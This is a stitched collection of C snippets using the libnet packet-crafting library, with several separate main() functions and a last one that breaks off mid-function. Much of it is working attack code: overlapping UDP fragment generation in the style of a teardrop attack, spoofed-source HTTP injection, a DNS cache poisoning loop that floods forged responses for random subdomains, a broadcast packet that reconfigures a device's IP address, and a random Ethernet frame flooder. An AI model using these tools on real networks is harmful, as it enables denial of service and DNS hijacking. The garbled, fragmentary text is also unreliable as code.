int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{
libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;
if (!device)
device = DEVICE;
l = libnet_init (LIBNET_RAW4, device, errbuf);
if (!l) {
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);
dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);
src_prt = sPRT ? sPRT : SRC_PRT;
dst_prt = dPRT ? dPRT : DST_PRT;
if (count == 1) {
payload = "\0\0\0\0\0\0\0\0";
payload_s = 8;
}
udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);
if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
switch (count) {
case 1:
frag = IP_MF;
break;
case 2:
frag = 0x2002;
break;
case 3:
frag = 0x0003;
break;
}
ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);
if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
c = libnet_write (l);
if (c == -1) {
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
printf ("Wrote UDP packet; check the wire.\n");
libnet_destroy (l);
return (EXIT_SUCCESS);
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf;
char *dms;
int pay_s;
char *dmfn = "kw.txt";
char *paybuf, *pp;
u_char bt;
char linebuf[MAXTEXT];
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
dst_ip = libnet_get_prand(LIBNET_PRu32);
src_ip = libnet_get_prand(LIBNET_PRu32);
src_prt = libnet_get_prand(LIBNET_PRu16);
dst_prt = 80; /* http */
while ((c = getopt(argc, argv, "d:s:p:f:")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
dst_prt = (u_short)atoi(optarg);
printf("Dest port: %d\n", dst_prt);
break;
case 'f':
dmfn = optarg;
printf("File name: %s\n", dmfn);
break;
default:
exit(EXIT_FAILURE);
}
}
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening the content file %s \n", dmfn);
exit(1);
} /* end if */
printf("Reading content ...\n");
i = 0;
while ((i < MAXTEXT) && ( (c=fgetc(dmf)) != EOF ) )
{
linebuf[i++] = c;
}
fclose(dmf);
linebuf[i] = '\0';
paybuf = linebuf;
dms = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms, paybuf);
pay_s = strlen(dms);
/* ===== for message body debugging */
printf("Content read:\n");
for (i=0; i < pay_s; i++) {
bt = *(dms + i);
printf(" %02X", bt);
}
printf("\n");
/*=== */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
dms, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
/* usleep(20); slow down to conserve bandwidth */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
/* src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
*/
while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF)
{
switch (c)
{
case 'p':
strcpy(payload_file, optarg);
break;
case 't':
strcpy(tcp_file, optarg);
break;
case 'i':
strcpy(ip_file, optarg);
break;
case 'e':
strcpy(eth_file, optarg);
break;
default:
break;
}
}
if (optind != 9)
{
usage();
exit(0);
}
i_dns_bind2_addr = libnet_name2addr4(l, dns_bind2_addr, LIBNET_RESOLVE);
sscanf("08, 00, 27, 90, 31, 81", "%x, %x, %x, %x, %x, %x", &res_eth_saddr[0], &res_eth_saddr[1], &res_eth_saddr[2], &res_eth_saddr[3], &res_eth_saddr[4], &res_eth_saddr[5]);
srand((int)time(0));
int loop_counter = 0;
while (1==1) {
int randomNumber = (rand()%10000000);
while (randomNumber<1000000) randomNumber*=10;
sprintf(random_host, ".x-%d.%s", randomNumber,attack_domain);
printf("\nNow attacking with domain %s \n",random_host);
convertDomain();
// load_payload();
load_payload_query(); // get the new payload with random subdomain
load_ethernet();
load_tcp_udp();
load_ip();
convert_proto();
if(ip_proto_val==IPPROTO_TCP){
t = libnet_build_tcp(
t_src_port, /* source port */
t_des_port, /* destination port */
t_seq, /* sequence number */
t_ack, /* acknowledgement num */
t_control_val, /* control flags */
t_win, /* window size */
0, /* checksum */
t_urgent, /* urgent pointer */
LIBNET_TCP_H + payload_filesize, /* TCP packet size */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_TCP_H;
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
}
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_src_port, /* source port */
t_des_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_src_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
// sending the request to the DNS server
free(payload_location);
libnet_destroy(l);
// reinit the handle so that we can set new parameters to the handle.
for (i=0;i<10000;i++) { // loop to send 10000 responses for each request.
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
// reinit the handle for sending responses
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
load_payload_answer();
// generate the response and send it
// change the ports of source port and destination port to match the second DNS query
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_des_port, /* source port */
t_src_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
// change the ethernet headers to match the response from the second DNS server
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_dns_bind2_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
res_eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */
free(payload_location);
libnet_destroy(l);
}
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
loop_counter++;
printf("%d\n", loop_counter);
if(loop_counter == 2){
break;
}
// loop to do for multiple unique requests
}
/* give the buf memory back */
// clear memory
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
// clear memory on failure
}
int
main(int argc, char *argv[])
{
int c;
u_long i;
libnet_t *l;
char *device = NULL;
struct libnet_ether_addr *e;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 address getter\n");
while ((c = getopt(argc, argv, "i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
printf("Interface:\t%s\n", libnet_getdevice(l));
e = libnet_get_hwaddr(l);
if (e == NULL)
{
fprintf(stderr, "Can't get hardware address: %s\n", libnet_geterror(l));
}
else
{
printf("MAC address:\t");
for (c = 0; c < 6; c++)
{
printf("%2.2x", e->ether_addr_octet[c]);
if (c != 5)
{
printf(":");
}
}
printf("\n");
}
i = libnet_get_ipaddr4(l);
if (i == -1)
{
fprintf(stderr, "Can't get ip address: %s\n", libnet_geterror(l));
}
else
{
printf("IP address:\t");
printf("%s\n", libnet_addr2name4(i, LIBNET_DONT_RESOLVE));
}
exit(EXIT_SUCCESS);
}
int main()
{
libnet_t *handle;
char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id,seq;
char payload[] = "libnet :D";
int bytes_written;
handle = libnet_init(LIBNET_RAW4,NULL,errbuf);
if(handle == NULL)
{
fprintf(stderr,"libnet_init() failed: %s\n",errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(handle);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE);
if(ip_addr == -1)
{
fprintf(stderr,"Error converting IP address.\n");
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
seq = 1;
if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\
(u_int8_t *)payload,sizeof(payload),handle,0)==-1)
{
fprintf(stderr,"Error building ICMP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H + sizeof(payload),\
IPPROTO_ICMP,ip_addr,handle) == -1)
{
fprintf(stderr,"Error building IP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
bytes_written = libnet_write(handle);
if(bytes_written != -1)
printf("%d bytes written.\n",bytes_written);
else
fprintf(stderr,"Error writing packet: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
return 0;
}
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) {
/* Builds and sends the first packet, calling get_sum() to
* * get the correct checksum for the ICMP packet (with the
* * whole payload). Then builds and sends IP fragments
* * until all the payload is sent. */
char ip_addr_str[16];
u_int32_t ip_addr, src_addr;
u_int16_t id, seq, ip_id;
/* hdr_offset = fragmentation flags + offset (in bytes)
* * divided by 8 */
int pload_offset, hdr_offset;
int bytes_written, max_pload_size, packet_pload_size;
libnet_ptag_t ip_tag;
/* Generating random IDs */
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* We need a non-zero id number for the IP headers,
* * otherwise libnet will increase it after each
* * build_ipv4, breaking the fragments */
ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
seq = 1;
/* Getting IP addresses */
src_addr = libnet_get_ipaddr4(l);
if (src_addr == -1) {
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Destination IP address: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if (ip_addr == -1) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Getting max payload size */
max_pload_size = (MTU - LIBNET_IPV4_H);
/* making it a multiple of 8 */
max_pload_size -= (max_pload_size % 8);
pload_offset = 0;
/* Building the first packet, which carries the ICMP
* * header */
/* We're doing (payload size - icmp header size) and not
* * checking if it's a multiple of 8 because we know the
* * header is 8 bytes long */
if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) {
hdr_offset = IP_MF;
packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H;
} else {
hdr_offset = 0;
packet_pload_size = total_pload_size;
}
/* ICMP header */
if (libnet_build_icmpv4_echo(ICMP_ECHO, 0,
get_sum(payload, total_pload_size, id, seq), id,
seq, payload, packet_pload_size, l, 0) == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* First IP header (no payload, offset == 0) */
if (libnet_build_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l,
0) == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
/* Clearing */
/* We need to get rid of the ICMP header to build the
* * other fragments */
libnet_clear_packet(l);
ip_tag = LIBNET_PTAG_INITIALIZER;
/* Looping until all the payload is sent */
while (total_pload_size > pload_offset) {
/* Building IP header */
/* checking if there will be more fragments */
if ((total_pload_size - pload_offset) > max_pload_size) {
/* In IP's eyes, the ICMP header in the first packet
* needs to be in the offset, so we add its size to
* the payload offset here */
hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = max_pload_size;
} else {
/* See above */
hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = total_pload_size - pload_offset;
}
ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr,
ip_addr, (payload + pload_offset),
packet_pload_size, l, ip_tag);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
}
}
int main(int argc, char *argv[])
{
int c;
libnet_t *l;
char *device = "eth0";
char *dst = NULL;
char src[HOST_NAME_MAX+1];
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_ptag = 0;
char *cur_host;
int valid;
u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5};
u_long payload_s = 8;
int i;
while ((c = getopt(argc, argv, "d:i:h")) != EOF)
{
switch (c)
{
case 'd':
dst = optarg;
break;
case 'i':
device = optarg;
break;
case 'h':
usage(argv[0]);
exit(EXIT_SUCCESS);
default:
exit(EXIT_FAILURE);
}
}
if (!dst) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
gethostname(src, HOST_NAME_MAX);
cur_host = valid_hosts[0];
for (i=0, valid=0; cur_host; i++) {
if (strstr(cur_host, src)) {
valid = 1;
break;
}
cur_host = valid_hosts[i];
}
if (!valid) {
fprintf(stderr, "Uh uh. I don't think so.\n");
exit(EXIT_FAILURE);
}
l = libnet_init(
LIBNET_RAW4, /* injection type */
device, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", dst);
exit(EXIT_FAILURE);
}
if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", src);
exit(EXIT_FAILURE);
}
ip_ptag = libnet_build_ipv4(
LIBNET_IPV4_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_RESTART, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
ip_ptag); /* libnet id */
if (ip_ptag == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Sent restart packet to %s.\n", dst);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
///////////////////////////////////////////////////////////////////////////////////
//
// Applies another SOURCE PORT from a specified range to a given UDP- or TCP-PTAG.
//
// Note: tx.sp MUST be already initialized with tx.sp_start
// This is done by 'get_port_range()' in tools.c.
//
// RETURN VALUE: '1' if tx.sp restarts
//
int update_SPORT(libnet_t *l, libnet_ptag_t t)
{
// u_int32_t SP;
int i=0;
// SP = (u_int32_t) tx.sp;
// SP++;
tx.sp++;
// Exceeded range => restart:
if ((tx.sp > tx.sp_stop) || // we exceeded the end of the range
(tx.sp == 65535) ) // or exceeded the 16-bit range
{
tx.sp = tx.sp_start;
i=1;
}
if (mode==UDP)
{
t = libnet_build_udp(tx.sp,
tx.dp,
tx.udp_len,
tx.udp_sum,
(tx.udp_payload_s) ? tx.udp_payload : NULL,
tx.udp_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr," mz/send_frame: UDP header manipulation failed!\n");
exit (1);
}
}
else // TCP
{
t = libnet_build_tcp (tx.sp,
tx.dp,
tx.tcp_seq,
tx.tcp_ack,
tx.tcp_control,
tx.tcp_win,
tx.tcp_sum,
tx.tcp_urg,
tx.tcp_len,
(tx.tcp_payload_s) ? tx.tcp_payload : NULL,
tx.tcp_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr, " mz/update_DPORT: Can't build TCP header: %s\n", libnet_geterror(l));
exit (0);
}
}
return i;
}
int main (int argc, char *argv[]) {
libnet_t *p;
libnet_ptag_t ip, udp, ipoptions, ether;
u_long srcip, dstip;
u_short srcport = 62976, dstport = 62976, x;
signed int ret;
char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
int len;
int8_t *macdst = "ff:ff:ff:ff:ff:ff";
u_int8_t *macdest;
char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
"\x0a\x00\x32\x32" /* ip address to set too */
"\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
u_short payloadlen = strlen(payload);
srcip = libnet_get_ipaddr4(p); /* mod to spoof */
dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
udp = ip = ether = ipoptions = 0;
if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
exit (1);
}
if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
fprintf(stderr,"cant init() - %s\n",errbuff);
exit (1);
}
if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
exit (1);
}
for (x=0;x<20;x++) {
ipopt[x] = libnet_get_prand(LIBNET_PR2);
}
ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);
if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen +
LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
exit (1);
}
if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
exit (1);
}
//libnet_diag_dump_pblock(p);
if ( (ret = libnet_write(p)) == -1) {
fprintf(stderr,"%s\n",libnet_geterror(p));
}
free(macdest); /* hex_aton malloc's - see libnet doco */
libnet_destroy(p);
return 0;
}
int main(int argc, char **argv)
{
u_char compare[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char dhost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char shost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
struct ether_header *ether = NULL;
u_int16_t proto = htons(ETHERTYPE_IP);
struct ether_addr *ea = NULL;
u_int16_t *data = NULL;
char dev[128] = "";
u_char *buf = NULL;
int proto_rand = 0;
struct timeval tv, tv2;
int max_len = ETHER_FRAME_SIZE;
u_long count = 0xffffffffl;
u_long data_pushed = 0;
struct ip *ip = NULL;
u_long data_len = 0;
int rand_source = 0;
int rand_dest = 0;
long mark = 1000;
u_long skip = 0; /* Skip how many packets */
u_long acx = 0;
int debug = 0;
u_int len = 0;
u_int cx = 0;
float sec;
int seed;
u_int c;
/* libnet variables */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
seed = getpid();
while((c=getopt(argc, argv, "hi:s:d:k:p:r:c:l:Dvm:")) != (unsigned) EOF) {
switch (c) {
case 'i':
if (rindex(optarg, '/'))
strncpy(dev, (char *) rindex(optarg, '/')+1, 128);
else
strncpy(dev, optarg, 128);
dev[127] = '\0';
break;
case 's':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random source MAC's\n");
shost[0] = 0xff;
rand_source = 1;
break;
}
bcopy(atoether(optarg), shost, 6);
break;
case 'd':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random destination MAC's\n");
dhost[0] = 0xff;
rand_dest = 1;
break;
}
bcopy(atoether(optarg), dhost, 6);
break;
case 'r':
seed = atoi(optarg);
break;
case 'c':
count = atol(optarg);
break;
case 'm':
mark = atol(optarg);
if (mark <= 0)
exit(printf("Please use a positive arg for -m\n"));
break;
case 'k':
skip = atol(optarg);
printf("Will not transmit first %li packet(s).\n", skip);
break;
case 'D':
debug++;
break;
case 'l':
max_len = atoi(optarg);
if ( max_len > 1500 ) {
printf("Maximum Length of %i is longer than the max "
"ethernet frame size of %i\n", max_len,
ETHER_FRAME_SIZE);
exit(0);
}
if ( max_len < 14) {
printf("You seam to have entered %i as the maximum "
"length... Please make it >= 14\n", max_len);
exit(0);
}
break;
case 'p':
if ( strcasecmp(optarg, "rand") == 0 ) {
proto_rand++;
break;
}
proto_rand = 0;
proto = htons(atoi(optarg));
break;
case 'v':
printf("Version %s\n", VERSION);
exit(0);
case 'h':
default:
usage(argv[0]);
exit( 0 );
}
}
if ( *dev == '\0' ) {
usage(argv[0]);
exit( 0 );
}
/* Initialize libnet context, Root priviledges are required.*/
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
dev, /* network interface */
errbuf); /* error buffer */
if (l == NULL) {
fprintf(stderr, "Can not initialize libnet: %s", errbuf);
exit( -1 );
}
max_len -= 6 + 6 + 2;
printf("Seeding with %i\n", seed);
srand(seed);
if ( (buf = malloc(ETHER_FRAME_SIZE)) == NULL ) {
perror("malloc");
exit( -1 );
}
bzero(buf, ETHER_FRAME_SIZE);
ether = (struct ether_header *) buf;
if ( bcmp(dhost, compare, 6) == 0 )
memset(ether->ether_dhost, 0xff, 6);
else bcopy(dhost, ether->ether_dhost, 6);
if ( bcmp(shost, compare, 6) == 0 ) {
if ( (ea = (struct ether_addr *)libnet_get_hwaddr(l)) == 0 )
fprintf(stderr, "Cannot get MAC for %s: %s", dev, libnet_geterror(l));
bcopy(ea, ether->ether_shost, 6);
} else bcopy(shost, ether->ether_shost, 6);
printf("Maximum packet size (minus header) is %i bytes\n", max_len);
if ( proto_rand )
printf("Ethernet protocols will be randomized.\n");
else printf("Ethernet protocol will be %i.\n", ntohs(proto));
if ( !rand_dest )
printf("Sending to MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
else printf("Sending to random MAC addresses.\n");
if ( !rand_source )
printf("Sending from MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
else printf("Sending from random MAC addresses.\n");
ip = (struct ip *) (buf + 14);
data = (u_int16_t *) (buf + 14);
printf("Sending...\n");
gettimeofday(&tv, NULL);
for ( acx = 1; acx <= count; acx++ ) {
len = sizeof(struct ether_header);
if ( rand_source ) {
((u_int16_t *) ether->ether_shost)[0] = RAND16;
((u_int16_t *) ether->ether_shost)[1] = RAND16;
((u_int16_t *) ether->ether_shost)[2] = RAND16;
}
if ( rand_dest ) {
((u_int16_t *) ether->ether_dhost)[0] = RAND16;
((u_int16_t *) ether->ether_dhost)[1] = RAND16;
((u_int16_t *) ether->ether_dhost)[2] = RAND16;
}
if ( proto_rand )
ether->ether_type = RAND16;
else ether->ether_type = proto;
data_len = (u_int) (max_len * (rand()/((float) RAND_MAX + 1)));
data_len >>= 1;
for ( cx = 0; cx < data_len; cx++ )
data[cx] = RAND16;
data_len <<= 1;
if ( rand() & 0x1 ) {
data_len++;
data[cx] = RAND16;
}
len += data_len;
ip->ip_len = htons(data_len);
ip->ip_sum = 0;
